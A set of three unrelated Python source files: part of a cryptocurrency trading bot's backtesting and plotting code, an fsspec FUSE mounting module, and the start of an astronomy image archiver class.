storage['buys'][0].append(info['current_time'])
storage['buys'][1].append(price)
portfolio['assets'] = portfolio['currency'] / price
if LIVE or BACKTEST:
plot_text()
if storage['market_cross'] is True:
call = 'BULL SUPPORT'
else:
call = 'BEAR DESPAIR'
print(('[%s] %s BUY %s %.2f %s at %s sat value %.2f %s' %
(now, storage['trades'], call,
portfolio['assets'], ASSET,
int(price * ANTISAT), portfolio['currency'], CURRENCY)))
plt.plot(info['current_time'], (price), markersize=10,
marker='^', color='lime', label='buy')
portfolio['currency'] = 0
if LIVE:
plt.pause(0.0001)
def test_sell(price): # Execute a backtest sell
storage['trades'] += 1
now = info['current_time']
storage['sells'][0].append(info['current_time'])
storage['sells'][1].append(price)
portfolio['currency'] = portfolio['assets'] * price
if LIVE or BACKTEST:
plot_text()
plt.plot(info['current_time'], (price), markersize=10,
marker='v', color='coral', label='sell')
if storage['market_cross'] is True:
call = 'BULL OVERBOUGHT'
else:
call = 'BEAR RESISTANCE'
if storage['buys'][1][-1]:
buy_price = storage['buys'][1][-1]
buy_time = storage['buys'][0][-1]
if price > buy_price:
plt.plot((buy_time, now), (buy_price, price),
color='lime', label='win', lw=2)
else:
plt.plot((buy_time, now), (buy_price, price),
color='coral', label='loss', lw=2)
print(('[%s] %s SELL %s %.2f %s at %s sat value %.2f %s' %
(time.ctime(now), storage['trades'], call,
portfolio['assets'], ASSET,
int(price * ANTISAT), portfolio['currency'], CURRENCY)))
portfolio['assets'] = 0
if LIVE:
plt.pause(0.0001)
# PLOT, PRINT, ALARM
def draw_state_machine( # Plots primary trade indications
now, selloff, support, resistance, despair,
buying, selling, min_cross, max_cross,
market_cross, ma2):
if not SALES:
if market_cross:
plt.plot((now, now), (selloff, support),
color='lime', label='state', alpha=0.2)
plt.plot((now, now), (resistance, despair),
color='darkorchid', label='state', alpha=0.2)
else:
plt.plot((now, now), (resistance, despair),
color='red', label='state', alpha=0.2)
plt.plot((now, now), (selloff, support),
color='darkorchid', label='state', alpha=0.2)
plt.plot((now, now), ((max_cross), (min_cross)),
color='white', label='cross', alpha=1.0)
plt.plot(now, (ma2), markersize=6, marker='.',
color='aqua', label='ma2')
plt.plot(now, max_cross, markersize=3, marker='.',
color='white', label='cross')
plt.plot(now, min_cross, markersize=3, marker='.',
color='white', label='cross')
# plot market extremes
plt.plot(now, selloff, markersize=3, marker='.',
color='darkorchid', label='selloff')
plt.plot(now, despair, markersize=3, marker='.',
color='darkorchid', label='despair')
plt.plot(now, resistance, markersize=3, marker='.',
color='darkorchid', label='resistance')
plt.plot(now, support, markersize=3, marker='.',
color='darkorchid', label='support')
plt.plot(now, buying, markersize=6, marker='.',
color='lime', label='buying')
plt.plot(now, selling, markersize=6, marker='.',
color='red', label='selling')
def test_rechart_orders(): # Set buy/sell markers on top
for i in range(len(storage['sells'][0])):
plt.plot(storage['sells'][0][i], (storage['sells'][1][i]),
markersize=10, marker='v', color='coral', label='sell')
for i in range(len(storage['buys'][0])):
plt.plot(storage['buys'][0][i], (storage['buys'][1][i]),
markersize=10, marker='^', color='lime', label='buy')
chart_star()
plt.pause(0.001)
def live_chart_latest(): # Plot last 24hrs of 5m candles
now = int(time.time())
days = 1
candle = 300
d = backtest_candles(PAIR, (now - days * 86400), now, candle)
high = d['high']
low = d['low']
close = d['close']
unix = d['unix']
for i in range(len(unix)):
now = unix[i]
if low[i] < close[i]:
plt.plot(now, low[i], markersize=6, marker='.',
color='m', label='low')
if high[i] > close[i]:
plt.plot(now, high[i], markersize=6, marker='.',
color='m', label='high')
plt.plot(now, close[i], markersize=2, marker='.',
color='y', label='close')
plt.pause(0.001)
def test_chart_latest(): # Plot high resolution end of backtest
# plot 1 day of 5m candles
days = 1
candle = 300
d = backtest_candles(
PAIR, (info['end'] - days * 86400), info['end'], candle)
high = d['high']
low = d['low']
close = d['close']
unix = d['unix']
for i in range(len(unix)):
now = unix[i]
if low[i] < close[i]:
plt.plot((now), (high[i]), markersize=4, marker='.',
color='m', label='high')
if high[i] > close[i]:
plt.plot((now), (low[i]), markersize=4, marker='.',
color='m', label='low')
plt.plot((now), (close[i]), markersize=4, marker='.',
color='y', label='close')
# plot last 30 days of 2h
days = 30
candle = 7200
d = backtest_candles(
PAIR, (info['end'] - days * 86400), info['end'], candle)
high = d['high']
low = d['low']
close = d['close']
unix = d['unix']
for i in range(len(unix)):
now = unix[i]
if low[i] < close[i]:
plt.plot((now), (high[i]), markersize=4, marker='.',
color='m', label='high')
if high[i] > close[i]:
plt.plot((now), (low[i]), markersize=4, marker='.',
color='m', label='low')
plt.plot((now), (close[i]), markersize=4, marker='.',
color='y', label='close')
plt.pause(0.001)
def test_chart(): # Add objects to backtest plot
# localize data
now = info['current_time']
ma1 = storage['ma1'][-1]
ma2 = storage['ma2'][-1]
close = storage['close']
high = storage['high']
low = storage['low']
selloff = storage['selloff']
despair = storage['despair']
resistance = storage['resistance']
support = storage['support']
max_cross = storage['max_cross']
min_cross = storage['min_cross']
market_cross = storage['market_cross']
buying = storage['buying']
selling = storage['selling']
draw_state_machine(now, selloff, support,
resistance, despair, buying, selling,
min_cross, max_cross, market_cross, ma2)
# plot candles
plt.plot((now, now), ((high[-1]), (low[-1])),
color='m', label='high_low', alpha=0.5)
plt.plot(now, (close[-1]), markersize=4, marker='.',
color='y', label='close')
if info['tick'] == 0:
chart_star()
def live_chart(): # Add objects to live plot
cex_rate = storage['cex_rate']
dex_rate = storage['dex_rate']
m_volume = storage['m_volume']
ma1 = storage['ma1'][-1]
ma2 = storage['ma2'][-1]
ma3 = storage['ma3'][-1]
ma4 = storage['ma4'][-1]
selloff = storage['selloff']
despair = storage['despair']
resistance = storage['resistance']
support = storage['support']
buying = storage['buying']
selling = storage['selling']
ask = book['askp'][0]
bid = book['bidp'][0]
scalp_resistance = storage['scalp_resistance']
scalp_support = storage['scalp_support']
max_cross = storage['max_cross']
min_cross = storage['min_cross']
market_cross = storage['market_cross']
now = info['current_time']
high = storage['high']
low = storage['low']
# plot state machine
draw_state_machine(now, selloff, support,
resistance, despair, buying, selling,
min_cross, max_cross, market_cross, ma2)
plt.plot(now, high,
markersize=3, marker='.', color='m', label='high')
plt.plot(now, low,
markersize=3, marker='.', color='m', label='low')
plt.plot(now, scalp_resistance, markersize=4, marker='.',
color='tomato', label='scalp_resistance')
plt.plot(now, scalp_support, markersize=4, marker='.',
color='palegreen', label='scalp_support')
plt.plot(now, ask, markersize=3, marker='.',
color='aqua', label='ask')
plt.plot(now, bid, markersize=3, marker='.',
color='aqua', label='bid')
plt.plot(now, dex_rate, markersize=4 * m_volume, marker='.',
color='khaki', label='dex_rate')
plt.plot(now, cex_rate, markersize=4 * m_volume, marker='.',
color='yellow', label='cex_rate')
if info['tick'] == 0:
# clone the backtest in higher resolution for last 24hrs
plt.plot((now, now), (selloff, despair),
color='white', label='vertical start', lw=5, alpha=0.2)
ma1_period = MA1 * 86400 / 7200.0
ma2_period = MA2 * 86400 / 7200.0
ma1_arr = float_sma(data['7200']['close'], ma1_period)
ma2_arr = float_sma(data['7200']['close'], ma2_period)
unix = data['7200']['unix']
for i in range(-1, -20, -1):
for z in range(0, 7200, 300):
try:
now = unix[i] + z
ma1 = ma1_arr[i]
ma2 = ma2_arr[i]
# state machine clone
min_cross = MIN_CROSS * ma1
max_cross = MAX_CROSS * min_cross
bull_stop = BULL_STOP * ma2
bear_stop = BEAR_STOP * ma2
selloff = SELLOFF * ma1
despair = DESPAIR * ma1
support = max((SUPPORT * ma1), bull_stop)
resistance = min((RESISTANCE * ma1), bear_stop)
if market_cross:
selling = selloff
buying = support
else:
buying = despair
selling = resistance
# plot state machine
draw_state_machine(now, selloff, support,
resistance, despair, buying, selling,
min_cross, max_cross, market_cross, ma2)
except:
print ('plot ma_arr failed')
pass
chart_star()
plt.pause(0.001)
def chart_star(): # Plot a star at begin and end of backtest
now = info['current_time']
if info['live']:
cex_rate = storage['cex_rate']
else:
cex_rate = (storage['close'][-1])
plt.plot(now, cex_rate, markersize=50,
marker='1', color='w', label='cex_rate')
plt.plot(now, cex_rate, markersize=40,
marker='2', color='y', label='cex_rate')
plt.plot(now, cex_rate, markersize=40,
marker='3', color='w', label='cex_rate')
plt.plot(now, cex_rate, markersize=50,
marker='4', color='y', label='cex_rate')
plt.plot(now, cex_rate, markersize=15,
marker='.', color='y', label='cex_rate')
def plot_format(): # Set plot colors and attributes
warnings.filterwarnings("ignore", category=cbook.mplDeprecation)
ax = plt.gca()
ax.patch.set_facecolor('0.1')
ax.yaxis.tick_right()
ax.spines['bottom'].set_color('0.5')
ax.spines['top'].set_color(None)
ax.spines['right'].set_color('0.5')
ax.spines['left'].set_color(None)
ax.tick_params(axis='x', colors='0.7', which='both')
ax.tick_params(axis='y', colors='0.7', which='both')
ax.yaxis.label.set_color('0.9')
ax.xaxis.label.set_color('0.9')
plt.minorticks_on
plt.grid(b=True, which='major', color='0.2', linestyle='-')
plt.grid(b=True, which='minor', color='0.2', linestyle='-')
if (info['live'] is False) and (info['tick'] > 1):
plt.ylabel('LOGARITHMIC PRICE SCALE')
plt.yscale('log')
if info['live'] is True:
plt.ylabel('MARKET PRICE')
ax.yaxis.set_major_formatter(matplotlib.ticker.ScalarFormatter())
ax.yaxis.set_minor_formatter(matplotlib.ticker.ScalarFormatter())
ax.yaxis.set_major_formatter(matplotlib.ticker.FormatStrFormatter("%.8f"))
ax.yaxis.set_minor_formatter(matplotlib.ticker.FormatStrFormatter("%.8f"))
if info['live']:
stepsize = 3600
else:
if DAYS > 100:
stepsize = 2592000
elif DAYS > 20:
stepsize = 864000
else:
stepsize = 86400
start, end = ax.get_xlim()
ax.xaxis.set_ticks(np.arange((end - end % 3600), start, -stepsize))
def timestamp(x, pos):
if not info['live']:
return (datetime.fromtimestamp(x)).strftime('%Y-%m-%d')
else:
return (datetime.fromtimestamp(x)).strftime('%m/%d %H:%M')
ax.xaxis.set_major_formatter(matplotlib.ticker.FuncFormatter(timestamp))
if info['tick'] > 1:
# force 'autoscale'
yd = [] # matrix of y values from all lines on plot
xd = [] # matrix of x values from all lines on plot
for n in range(len(plt.gca().get_lines())):
line = plt.gca().get_lines()[n]
yd.append((line.get_ydata()).tolist())
xd.append((line.get_xdata()).tolist())
yd = [item for sublist in yd for item in sublist]
ymin, ymax = np.min(yd), np.max(yd)
ax.set_ylim([0.95 * ymin, 1.05 * ymax])
xd = [item for sublist in xd for item in sublist]
xmin, xmax = np.min(xd), np.max(xd)
ax.set_xlim([xmin, xmax])
if (info['live'] is False):
# add sub minor ticks
set_sub_formatter = []
sub_ticks = [10, 11, 12, 14, 16, 18, 22, 25, 35, 45]
sub_range = [-8, 8]
for i in sub_ticks:
for j in range(sub_range[0], sub_range[1]):
set_sub_formatter.append(i * 10 ** j)
k = []
for l in set_sub_formatter:
if ymin < l < ymax:
k.append(l)
ax.set_yticks(k)
if info['live']:
start, end = ax.get_ylim()
stepsize = abs(start - end) / 25
ax.yaxis.set_ticks(np.arange(end, start, -stepsize))
plt.gcf().autofmt_xdate(rotation=30)
ax.title.set_color('darkorchid')
plt.title(('%s ' % PAIR) + VERSION)
plt.tight_layout()
def plot_text(): # Display market condition on plot
# clear text
storage['text'] = storage.get('text', [])
for text in storage['text']:
try:
text.remove()
except:
pass
# static text
textx = 0.1 * (plt.xlim()[1] - plt.xlim()[0]) + plt.xlim()[0]
texty = 0.8 * (plt.ylim()[1] - plt.ylim()[0]) + plt.ylim()[0]
storage['text'].append(plt.text(textx, texty,
'litepresence', color='aqua',
alpha=0.2, size=70))
textx = 0.27 * (plt.xlim()[1] - plt.xlim()[0]) + plt.xlim()[0]
texty = 0.7 * (plt.ylim()[1] - plt.ylim()[0]) + plt.ylim()[0]
storage['text'].append(plt.text(textx, texty,
'EXTINCTION EVENT', color='aqua',
alpha=0.3, size=25, weight='extra bold'))
textx = 0.1 * (plt.xlim()[1] - plt.xlim()[0]) + plt.xlim()[0]
texty = 0.08 * (plt.ylim()[1] - plt.ylim()[0]) + plt.ylim()[0]
storage['text'].append(
plt.text(textx, texty, '(BTS) litepresence1',
color='white', alpha=0.5, size=10, weight='extra bold'))
textx = 0.4 * (plt.xlim()[1] - plt.xlim()[0]) + plt.xlim()[0]
texty = 0.1 * (plt.ylim()[1] - plt.ylim()[0]) + plt.ylim()[0]
storage['text'].append(
plt.text(textx, texty, (ASSET + CURRENCY),
color='yellow', alpha=0.1, size=70, weight='extra bold'))
textx = 0.6 * (plt.xlim()[1] - plt.xlim()[0]) + plt.xlim()[0]
texty = 0.05 * (plt.ylim()[1] - plt.ylim()[0]) + plt.ylim()[0]
text = 'BACKTEST '
if info['live']:
text = 'LIVE '
text += storage['asset_name']
storage['text'].append(
plt.text(textx, texty, text,
color='yellow', alpha=0.25, size=20, weight='extra bold'))
# dynamic text
if info['live']:
high = storage['cex_rate']
low = storage['cex_rate']
else:
high = storage['high'][-1]
low = storage['low'][-1]
textx = 0.1 * (plt.xlim()[1] - plt.xlim()[0]) + plt.xlim()[0]
texty = 0.1 * (plt.ylim()[1] - plt.ylim()[0]) + plt.ylim()[0]
if storage['market_cross']:
storage['text'].append(
plt.text(textx, texty, 'BULL MARKET',
color='lime', alpha=0.3, size=30, weight='extra bold'))
textx = 0.125 * (plt.xlim()[1] - plt.xlim()[0]) + plt.xlim()[0]
texty = 0.05 * (plt.ylim()[1] - plt.ylim()[0]) + plt.ylim()[0]
if low < storage['buying']:
storage['text'].append(
plt.text(textx, texty, 'BUY SUPPORT',
color='lime', alpha=0.5, size=20,
weight='extra bold'))
elif high > storage['selling']:
storage['text'].append(
plt.text(textx, texty, 'SELL OVERBOUGHT',
color='red', alpha=0.5, size=20,
weight='extra bold'))
else:
storage['text'].append(
plt.text(textx, texty, 'BEAR MARKET',
color='red', alpha=0.3, size=30, weight='extra bold'))
textx = 0.125 * (plt.xlim()[1] - plt.xlim()[0]) + plt.xlim()[0]
texty = 0.05 * (plt.ylim()[1] - plt.ylim()[0]) + plt.ylim()[0]
if low < storage['buying']:
storage['text'].append(
plt.text(textx, texty, 'BUY DESPAIR',
color='lime', alpha=0.5, size=20,
weight='extra bold'))
elif high > storage['selling']:
storage['text'].append(
plt.text(textx, texty, 'SELL RESISTANCE',
color='red', alpha=0.5, size=20, weight='extra bold'))
plt.tight_layout()
def test_plot(): # Display backtest plot
begin = info['begin']
end = info['end']
while (end - begin) > LIVE_PLOT_DEPTH:
# PLOT FORMAT
try:
ax = plt.gca()
# Window Plot
left, right = ax.set_xlim(left=begin - 50, right=end + 50)
# Prevent Memory Leak Outside Plot Window
for l in ax.get_lines():
xval = l.get_xdata()[0]
if (xval < begin):
l.remove()
if LIVE:
begin = begin + 0.3 * (end - begin)
else:
begin = end
plt.tight_layout()
plt.pause(0.0001)
except:
print('animated test plot failed')
plot_text()
plot_format()
# if LIVE: plt.clf() # clear the plotted figure; end log scale
if BACKTEST:
try:
plt.autoscale(enable=True, axis='y')
plt.pause(0.0001)
except:
print('static test plot failed')
def live_plot(): # Display live plot
now = int(time.time())
ax = plt.gca()
# Window Plot
ax.set_xlim(([(now - LIVE_PLOT_DEPTH), (now)]))
# Prevent Memory Leak Outside Plot Window; remove unnecessary data
for l in ax.get_lines():
xval = l.get_xdata()[0]
if (xval < (ax.get_xlim()[0])):
l.remove()
plot_text()
plt.tight_layout()
plt.pause(0.0001)
def test_stop(): # Display results of backtest session
close = storage['close'][-1]
# ctime_tick_labels()
# move to currency
if BACKTEST and (portfolio['assets'] > 0.1) and CURRENCY_STOP:
print('stop() EXIT TO CURRENCY')
test_sell(price=close)
# calculate return on investment
end_max_assets = portfolio['assets'] + (portfolio['currency'] / close)
end_max_currency = portfolio['currency'] + (portfolio['assets'] * close)
roi_assets = end_max_assets / storage['begin_max_assets']
roi_currency = end_max_currency / storage['begin_max_currency']
storage['roi_currency'] = roi_currency
days = (info['end'] - info['begin']) / 86400.0
frequency = (SATOSHI + storage['trades']) / days
storage['dpt'] = 1.0 / frequency
# A = P*(1+(r/n))**(n*t)
P = storage['begin_max_currency']
t = DAYS / 365.0
A = end_max_currency
n = 1.0
r = n * ((A / P) ** (1 / (n * t)) - 1)
storage['apy_currency'] = r
if LIVE or BACKTEST:
print(
'===============================================================')
print(('START DATE........: %s' % time.ctime(info['begin'])))
print(('END DATE..........: %s' % time.ctime(info['end'])))
print(('DAYS..............: %.1f' % days))
print(('TRADES............: %s' % storage['trades']))
print(('DAYS PER TRADE....: %.1f' % storage['dpt']))
print(('START PRICE.......: %.8f ' % data['close'][-DAYS]))
print(('END PRICE.........: %.8f' % close))
print(('START PORTFOLIO...: %.1f %s %.1f %s' %
(START_CURRENCY, CURRENCY, START_ASSETS, ASSET)))
print(
('START MAX ASSETS..: %s %s' %
(storage['begin_max_assets'], ASSET)))
print(('END MAX ASSETS....: %s %s' % (end_max_assets, ASSET)))
print(('ROI ASSETS........: %.2fX' % roi_assets))
print(('START MAX CURRENCY: %s %s' %
(storage['begin_max_currency'], CURRENCY)))
print(('END MAX CURRENCY..: %s %s' % (end_max_currency, CURRENCY)))
print(('ROI CURRENCY......: %.2fX' % roi_currency))
# print(('APY CURRENCY......: %.2f' % storage['apy_currency']))
print(
'===============================================================')
print(VERSION)
print('~===END BACKTEST=========================~')
test_rechart_orders()
def print_tune(): # Display input thresholds
storage['roi_currency'] = storage.get('roi_currency', ROI)
storage['apy_currency'] = storage.get('apy_currency', APY)
storage['dpt'] = storage.get('dpt', DPT)
storage['trades'] = storage.get('trades', 0)
frequency = (SATOSHI + storage['trades']) / DAYS
z = '+=' if OPTIMIZE else '='
print('#######################################')
print(('CURRENCY = "%s"' % CURRENCY))
print(('ASSET = "%s"' % ASSET))
print(('MA1 %s %.2f' % (z, MA1)))
print(('MA2 %s %.2f' % (z, MA2)))
print(('SELLOFF %s %.3f' % (z, SELLOFF)))
print(('SUPPORT %s %.3f' % (z, SUPPORT)))
print(('RESISTANCE %s %.3f' % (z, RESISTANCE)))
print(('DESPAIR %s %.3f' % (z, DESPAIR)))
print(('MIN_CROSS %s %.3f' % (z, MIN_CROSS)))
print(('MAX_CROSS %s %.3f' % (z, MAX_CROSS)))
print(('BULL_STOP %s %.3f' % (z, BULL_STOP)))
print(('BEAR_STOP %s %.3f' % (z, BEAR_STOP)))
print('#######################################')
# print(('# RESOLUTION : %s' % RESOLUTION))
print(('# DAYS : %s' % DAYS))
print(('DPT = %.1f' % storage['dpt']))
print(('# MARKET CAP....: %.1fM' % asset_cap))
print(('# DOMINANCE.....: %.4f - RANK %s' % (asset_dominance, asset_rank)))
print(('ROI = %.2fX' % storage['roi_currency']))
# print(('APY = %.2f' % storage['apy_currency']))
print('#######################################')
def bell(duration, frequency): # Activate linux audible bell
os.system('play --no-show-progress --null --channels 1 synth' +
' %s sine %f' % (duration, frequency))
# DATA PROCESSING
def clock(): # 24 hour clock formatted HH:MM:SS
return str(time.ctime())[11:19]
def satoshi(n): # format prices to satoshi type
return float('%.8f' % float(n))
def dictionaries(): # Global info, data, portfolio, and storage
global info, storage, portfolio, book
info = {}
book = {}
storage = {}
portfolio = {}
def coin_name(): # Convert ticker symbols to coin names
curr = currencies()
storage['asset_name'] = curr[ASSET]['CoinName']
storage['currency_name'] = curr[CURRENCY]['CoinName']
print((storage['asset_name']))
def ctime_tick_labels(): # X axis timestamps formatting
ax = plt.gca()
fig.canvas.draw()
labels = ax.get_xticklabels()
xlabels = []
for label in labels:
x = label.get_text()
print(x)
try:
xlabels.append(float(x))
except:
xlabels.append(str(x))
for i in range(len(xlabels)):
try:
if isinstance(xlabels[i], float):
xlabels[i] = time.ctime(float(xlabels[i]))
except:
pass
ax.set_xticklabels(xlabels)
def indicators(): # Post process data
global storage
global book
ma1_period = MA1 * 86400.0 / CANDLE
ma2_period = MA2 * 86400.0 / CANDLE
if not info['live']:
# alpha moving averages
storage['ma1'] = float_sma(storage['close'], ma1_period)
storage['ma2'] = float_sma(storage['close'], ma2_period)
if info['live']:
# alpha moving averages
storage['ma1'] = float_sma(
data['7200']['close'], ma1_period)
storage['ma2'] = float_sma(
data['7200']['close'], ma2_period)
# scalp moving averages
storage['ma3'] = float_sma(data['300']['close'], 288 * MA3)
storage['ma4'] = float_sma(data['300']['close'], 288 * MA4)
# 20 minute high and low
storage['high'] = max(data['300']['high'][-4:])
storage['low'] = min(data['300']['low'][-4:])
# orderbook and last price
book = dex('book')
sbids = [('%.8f' % i) for i in book['bidp'][:3]]
sbids = sbids[::-1]
sasks = [('%.8f' % i) for i in book['askp'][:3]]
print (sbids, 'BIDS <> ASKS', sasks)
cex_rate = storage['cex_rate']
# means to buy and percent invested
assets = portfolio['assets']
currency = portfolio['currency']
means = storage['means'] = (currency + SATOSHI) / cex_rate
storage['asset_ratio'] = assets / (assets + means)
# recent volume ratio for plotting
depth = 100
mv = ((depth * data['300']['volume'][-1]) /
sum(data['300']['volume'][-depth:]))
storage['m_volume'] = 1 if mv < 1 else 5 if mv > 5 else mv
def float_sma(array, period): # floating point periods accepted
def moving_average(array, period): # numpy array moving average
csum = np.cumsum(array, dtype=float)
csum[period:] = csum[period:] - csum[:-period]
return csum[period - 1:] / period
if period == int(period):
return moving_average(array, int(period))
else:
floor_period = int(period)
ceil_period = int(floor_period + 1)
floor_ratio = ceil_period - period
ceil_ratio = 1.0 - floor_ratio
floor = moving_average(array, floor_period)
ceil = moving_average(array, ceil_period)
depth = min(len(floor), len(ceil))
floor = floor[-depth:]
ceil = ceil[-depth:]
ma = (floor_ratio * floor) + (ceil_ratio * ceil)
return ma
# ARTIFICIAL INTELLEGENCE
def state_machine(): # Alpha and beta market finite state
# localize primary indicators
ma1 = storage['ma1'][-1]
ma2 = storage['ma2'][-1]
min_cross = storage['min_cross'] = MIN_CROSS * ma1
max_cross = storage['max_cross'] = MAX_CROSS * storage['min_cross']
# set alpha state
storage['market_cross'] = storage.get('market_cross', MARKET_CROSS)
if storage['market_cross'] is False:
if (min_cross > ma2):
storage['market_cross'] = True
if storage['market_cross'] is True:
if (max_cross < ma2):
storage['market_cross'] = False
# Manual override alpha state
if info['live']:
if FORCE_ALPHA == 'BULL':
storage['market_cross'] = True
if FORCE_ALPHA == 'BEAR':
storage['market_cross'] = False
# establish beta thresholds
storage['selloff'] = (ma1 * SELLOFF)
storage['support'] = max(ma1 * SUPPORT, ma2 * BULL_STOP)
storage['resistance'] = min(ma1 * RESISTANCE, ma2 * BEAR_STOP)
storage['despair'] = (ma1 * DESPAIR)
# initialize backtest per MARKET_CROSS
if (info['live'] is False) and (info['tick'] == 0):
close = storage['close'][-1]
storage['selling'] = storage['buying'] = close
if MARKET_CROSS is True:
if START_CURRENCY > 0:
test_buy(close)
if MARKET_CROSS is False:
if START_ASSETS > 0:
test_sell(close)
# set beta state
if storage['market_cross']:
storage['buying'] = storage['support']
storage['selling'] = storage['selloff']
else:
storage['buying'] = storage['despair']
storage['selling'] = storage['resistance']
storage['mid_market'] = (storage['buying'] + storage['selling']) / 2
# PRIMARY PROCESS
if __name__ == "__main__":
print('')
print(VERSION)
print('')
tune_install()
keys_install()
asset_cap, asset_dominance, asset_rank = marketcap()
optimize = False
data = {}
control_panel()
if LATENCY:
nodes_update()
price, volume, latency = cryptocompare_last()
cryptocompare_time()
sys.exit()
if MODE in [2, 3]:
# initialize data feeds
last_update()
book_update()
dictionaries()
initialize()
test_initialize()
coin_name()
if (MODE in [2, 3]) or BACKTEST:
backtest()
print_tune()
if MODE in [2, 3]:
# begin background processes
p_node = Process(target=nodes_loop)
p_node.daemon = False
p_node.start()
p_last = Process(target=last_loop)
p_last.daemon = False
p_last.start()
p_book = Process(target=book_loop)
p_book.daemon = False
p_book.start()
# start live event loop
live()
if OPTIMIZE:
print ('https://www.youtube.com/watch?v=5ydqjqZ_3oc')
sys.exit()
#=======================================================================
''' EXTINCTION EVENT '''
#=======================================================================
#
# THE DESTROYER,
# litepresence - 2018
#
|
fuse.py | from __future__ import print_function
import os
import stat
from errno import ENOENT, EIO
from fuse import Operations, FuseOSError
import threading
import time
import pandas as pd
from fuse import FUSE
def str_to_time(s):
t = pd.to_datetime(s)
return t.to_datetime64().view('int64') / 1e9
class FUSEr(Operations):
def __init__(self, fs, path):
self.fs = fs
self.cache = {}
self.root = path.rstrip('/') + '/'
self.counter = 0
def getattr(self, path, fh=None):
path = ''.join([self.root, path.lstrip('/')]).rstrip('/')
try:
info = self.fs.info(path)
except FileNotFoundError:
raise FuseOSError(ENOENT)
data = {'st_uid': 1000, 'st_gid': 1000}
perm = 0o777
if info['type'] != 'file':
data['st_mode'] = (stat.S_IFDIR | perm)
data['st_size'] = 0
data['st_blksize'] = 0
else:
data['st_mode'] = (stat.S_IFREG | perm)
data['st_size'] = info['size']
data['st_blksize'] = 5 * 2**20
data['st_nlink'] = 1
data['st_atime'] = time.time()
data['st_ctime'] = time.time()
data['st_mtime'] = time.time()
return data
def readdir(self, path, fh):
path = ''.join([self.root, path.lstrip('/')])
files = self.fs.ls(path, False)
files = [os.path.basename(f.rstrip('/')) for f in files]
return ['.', '..'] + files
def mkdir(self, path, mode):
path = ''.join([self.root, path.lstrip('/')])
self.fs.mkdir(path)
return 0
def rmdir(self, path):
path = ''.join([self.root, path.lstrip('/')])
self.fs.rmdir(path)
return 0
def read(self, path, size, offset, fh):
f = self.cache[fh]
f.seek(offset)
out = f.read(size)
return out
def write(self, path, data, offset, fh):
f = self.cache[fh]
f.write(data)
return len(data)
def create(self, path, flags, fi=None):
fn = ''.join([self.root, path.lstrip('/')])
f = self.fs.open(fn, 'wb')
self.cache[self.counter] = f
self.counter += 1
return self.counter - 1
def open(self, path, flags):
fn = ''.join([self.root, path.lstrip('/')])
if flags % 2 == 0:
# read
mode = 'rb'
else:
# write/create
mode = 'wb'
self.cache[self.counter] = self.fs.open(fn, mode)
self.counter += 1
return self.counter - 1
def truncate(self, path, length, fh=None):
fn = ''.join([self.root, path.lstrip('/')])
if length != 0:
raise NotImplementedError
# maybe should be no-op since open with write sets size to zero anyway
self.fs.touch(fn)
def unlink(self, path):
fn = ''.join([self.root, path.lstrip('/')])
try:
self.fs.rm(fn, False)
except (IOError, FileNotFoundError):
raise FuseOSError(EIO)
def release(self, path, fh):
try:
if fh in self.cache:
f = self.cache[fh]
f.close()
self.cache.pop(fh)
except Exception as e:
print(e)
return 0
def chmod(self, path, mode):
raise NotImplementedError
def run(fs, path, mount_point, foreground=True, threads=False):
""" Mount stuff in a local directory
This uses fusepy to make it appear as if a given path on an fsspec
instance is in fact resident within the local file-system.
This requires that fusepy by installed, and that FUSE be available on
the system (typically requiring a package to be installed with
apt, yum, brew, etc.).
Parameters
----------
fs : file-system instance
From one of the compatible implementations
path : str
Location on that file-system to regard as the root directory to
mount. Note that you typically should include the terminating "/"
character.
mount_point : str
An empty directory on the local file-system where the contents of
the remote path will appear
foreground : bool
Whether or not calling this function will block. Operation will
typically be more stable if True.
threads : bool
Whether or not to create threads when responding to file operations
within the mounter directory. Operation will typically be more
stable if False.
"""
func = lambda: FUSE(FUSEr(fs, path),
mount_point, nothreads=not threads, foreground=True)
if foreground is False:
th = threading.Thread(target=func)
th.daemon = True
th.start()
return th
else: # pragma: no cover
try:
func()
except KeyboardInterrupt:
pass
|
archiver.py | """ Code to facilitate delayed archiving of FITS files in the images directory """
import os
import time
import queue
import atexit
import shutil
from contextlib import suppress
from threading import Thread
from astropy import units as u
from panoptes.utils.utils import get_quantity_value
from panoptes.utils.time import current_time
from panoptes.pocs.base import PanBase
VALID_EXTENSIONS = (".fits", ".fits.fz")
class Archiver(PanBase):
""" Class to watch the images directory for new files and move them to the archive directory
after enough time has passed.
"""
_valid_extensions = VALID_EXTENSIONS
def __init__(self, images_directory=None, archive_directory=None, delay_interval=None,
sleep_interval=None, status_interval=60, *args, **kwargs):
"""
Args:
images_directory (str): The images directory to archive. If None (default), uses
the directories.images config entry.
archive_directory (str): The archive directory. If None (default), uses
the directories.archive config entry.
delay_interval (u.Quantity): The minimum amount of time a file must spend in the
archive queue before it is archived. If None (default), uses the
archiver.delay_time config entry.
sleep_interval (u.Quantity): The amout of time to sleep in between checking for new
files to archive. Ideally this should be longer than delay_interval. If None
(default), uses the archiver.sleep_interval confing entry.
status_interval (float, optional): Sleep for this long between status reports. Default
60s.
*args, **kwargs: Parsed to PanBase initialiser.
"""
super().__init__(*args, **kwargs)
if images_directory is None:
images_directory = self.get_config("directories.images")
self.images_directory = str(images_directory)
if archive_directory is None:
archive_directory = self.get_config("directories.archive")
self.archive_directory = str(archive_directory)
self.logger.debug(f"Archive directory: {self.archive_directory}")
if delay_interval is None:
delay_interval = self.get_config("archiver.delay_interval")
self.delay_interval = get_quantity_value(delay_interval, u.minute) * u.minute
if sleep_interval is None:
sleep_interval = self.get_config("archiver.sleep_interval")
self.sleep_interval = get_quantity_value(sleep_interval, u.minute) * u.minute
self._status_interval = get_quantity_value(status_interval, u.second)
self._n_archived = 0
self._stop = False
self._archive_queue = queue.Queue()
self._status_thread = Thread(target=self._async_monitor_status)
self._watch_thread = Thread(target=self._async_watch_directory)
self._archive_thread = Thread(target=self._async_archive_files)
self._threads = [self._status_thread, self._watch_thread, self._archive_thread]
atexit.register(self.stop) # This gets called when python is quit
@property
def is_running(self):
return self.status["is_running"]
@property
def status(self):
""" Return a status dictionary.
Returns:
dict: The status dictionary.
"""
status = {"is_running": all([t.is_alive() for t in self._threads]),
"status_thread": self._status_thread.is_alive(),
"watch_thread": self._watch_thread.is_alive(),
"archive_thread": self._status_thread.is_alive(),
"queued": self._archive_queue.qsize(),
"archived": self._n_archived}
return status
def start(self):
""" Start archiving. """
self.logger.info("Starting archiving.")
self._stop = False
for thread in self._threads:
thread.start()
def stop(self, blocking=True):
""" Stop archiving.
Args:
blocking (bool, optional): If True (default), blocks until all threads have joined.
